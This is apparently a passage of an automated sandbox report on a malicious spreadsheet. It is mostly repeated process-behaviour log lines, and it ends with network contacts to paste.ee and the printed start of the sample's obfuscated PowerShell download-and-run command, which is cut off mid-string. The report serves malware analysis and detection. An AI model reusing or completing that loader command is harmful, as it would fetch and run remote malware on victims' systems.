Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: P018400.xla.xlsx	Stream path 'MBD000149AA/CONTENTS' entropy: 7.9671168067 (max. 8.0)
Source: P018400.xla.xlsx	Stream path 'MBD000149AB/CONTENTS' entropy: 7.95252481957 (max. 8.0)
Source: P018400.xla.xlsx	Stream path 'Workbook' entropy: 7.9972464424 (max. 8.0)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 559	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1072	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1631	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3273	Jump to behavior

Source: C:\Windows\System32\rundll32.exe TID: 540	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1932	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2012	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1096	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2352	Thread sleep count: 1631 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2352	Thread sleep count: 3273 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3076	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3080	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node			graph_12-451
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node			graph_12-454

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 12_2_035306FC mov edx, dword ptr fs:[00000030h]

12_2_035306FC

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 104.21.84.67 443			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Domain query: paste.ee

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreG